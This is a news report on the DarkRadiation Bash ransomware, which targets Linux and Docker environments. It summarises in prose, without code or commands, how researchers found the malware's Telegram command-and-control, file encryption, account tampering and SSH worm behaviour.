Cybersecurity experts have alerted the public to a new ransomware variant identified as “DarkRadiation,” which operates entirely within Bash. This strain specifically targets Linux and Docker cloud environments, utilizing the messaging platform Telegram for its command-and-control communications.
According to Trend Micro’s latest report, DarkRadiation is crafted in Bash and aims at Red Hat/CentOS and Debian distributions. The malware employs OpenSSL’s AES algorithm in CBC mode to encrypt files across various system directories. Additionally, it leverages the Telegram API for reporting its infection status to the attackers.
At present, details on how this ransomware is initially delivered remain scarce, and there is no confirmed evidence of its deployment in actual cyber incidents. The intelligence regarding DarkRadiation emerged from an investigation of hacker tools hosted on an unidentified threat actor’s infrastructure, specifically at an IP address linked to a directory labeled “api_attack.” The malicious toolset was first uncovered by a social media user on May 28.
DarkRadiation executes a multi-staged infection process, notable for its significant reliance on Bash scripting for malware retrieval and file encryption. The Telegram API is employed to maintain communication with the command-and-control server, utilizing hardcoded API keys. According to cybersecurity analyses, the ransomware is actively under development, featuring obfuscation techniques that employ an open-source tool named “node-bash-obfuscate” to fragment the code and assign aliases to each segment.
Upon its launch, DarkRadiation verifies if it is being executed by the root user, subsequently using elevated permissions to download critical tools like Wget, cURL, and OpenSSL. The malware continuously captures snapshots of active users on a Unix system every five seconds, transmitting this information back to an attacker-controlled server via the Telegram API.
If the necessary libraries are not found, the ransomware attempts to install them using YUM (Yellowdog Updater, Modified), a widely used package manager for Linux distributions like RedHat and CentOS. During its final stages, DarkRadiation compiles a list of available users on the compromised system, overwrites existing passwords with “megapassword,” and eliminates all shell users, while creating a new user named “ferrum” with a hardcoded password for the encryption process.
SentinelOne’s analysis highlights variations in the ransomware’s behavior, wherein the password for the “ferrum” user might either be hardcoded or downloaded from the command-and-control server. Significantly, the ransomware appends radioactive symbols (‘.☢’) to encrypted files. An accompanying SSH worm is configured to accept credential configurations in a base64-encoded format. This encoded argument allows it to connect to targeted systems via SSH and initiate the ransomware download.
In addition to reporting the execution status and encryption key back to the attacks, DarkRadiation can deactivate all running Docker containers on infected machines before displaying a ransom note to the victim. As SentinelOne researchers note, the use of shell script languages like Bash enables malware developers to be more adaptable, facilitating quicker iterations without the need for recompilation. This agility may allow attackers to evade detection, given that some security solutions depend on static file signatures, which can be circumvented through frequent updates.
As the cybersecurity landscape evolves, understanding attacks like DarkRadiation is crucial for business owners to bolster defenses and protect sensitive data. The techniques deployed in this ransomware assault are indicative of a broader trend where adversary tactics—including initial access and privilege escalation—are becoming increasingly sophisticated and challenging to mitigate.
